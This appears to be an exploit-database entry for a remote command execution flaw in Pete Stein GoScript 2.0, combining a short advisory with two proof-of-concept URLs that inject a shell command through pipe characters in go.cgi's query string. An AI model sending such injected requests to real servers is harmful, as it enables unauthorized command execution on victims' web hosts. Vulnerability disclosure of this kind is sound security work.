Pete Stein GoScript 2.0 - Remote Command Execution
Author: Francisco Alisson type: webapps platform: cgi port: date_added: 2004-08-04 date_updated: 2013-01-24 verified: 1 codes: OSVDB-8935 tags: aliases: screenshot_url: application_url: raw file: 24347.txt
source: https://www.securityfocus.com/bid/10853/info Pete Stein GoScript is prone to a remote command execution vulnerability. This may allow remote attackers to perform unauthorized actions on a victim computer in the context of the hosting Web server. http://www.example.com/go.cgi?|id| http://www.example.com/go.cgi?artarchive=|id|